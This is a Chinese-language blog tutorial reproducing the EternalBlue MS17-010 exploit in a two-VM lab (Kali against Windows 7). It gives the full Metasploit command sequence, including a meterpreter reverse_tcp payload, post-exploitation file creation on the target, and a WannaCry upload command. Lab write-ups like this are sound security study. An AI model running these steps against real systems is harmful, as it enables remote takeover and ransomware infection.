Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现

1. 前期准备

虚拟机:

  • kali
  • Windows 7

2. 保证受害者与攻击者主机能够通信

开启了两台虚拟机,保证在同一网段下

##Kali
ifconfig
##Windows 7
ipconfig

Kali攻击机IP为192.168.92.131
在这里插入图片描述
Windows下IP地址为192.168.92.136
在这里插入图片描述

两台虚拟机在同一网段,故可保持通信

3. 检查受害主机的TCP端口是否打开

nmap -sS 192.168.92.136

使用的是nmap模块,输入命令进行扫描
在这里插入图片描述
发现445端口打开,SMB漏洞MS17-010(永恒之蓝)正是基于445端口进行传播,因此可以加以利用

4. 在msfconsole中查询漏洞利用模块

这里有各种MS17-010漏洞版本,我们根据目标系统选择编号为3的版本

msfconsole
search ms17-010

在这里插入图片描述在这里插入图片描述

5. 利用永恒之蓝漏洞并设置相关参数

use exploit/windows/smb/ms17_010_eternalblue
##利用永恒之蓝漏洞
set payload windows/x64/meterpreter/reverse_tcp
##设置payload

在这里插入图片描述

set LHOST 192.168.92.131
##设置本机IP地址
set RHOSTS 192.168.92.136
##设置受害主机IP
set RPORT 445
##设置端口445,注意该端口共享功能是高危漏洞端口,包括之前分享的1393389等
exploit
##利用漏洞

在这里插入图片描述
看到WIN才说明利用成功,FAIL就是失败
在这里插入图片描述

6. 利用成功,获取WINDOWS系统管理员权限

getuid

返回系统管理员权限
在这里插入图片描述

7. 创建文件控制目标

cd ..
# 创建文件夹
mkdir hacker
# 访问目录
dir
cd hacker
# 创建文件并写入内容
echo helloworld>test.txt

在这里插入图片描述
就可以看到windows7电脑中新建了这么个文件
在这里插入图片描述

8.上传wannacry

我没这个病毒就不传了哈哈哈哈哈

shell
upload /root/wcry.exe c:\
  • 1
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值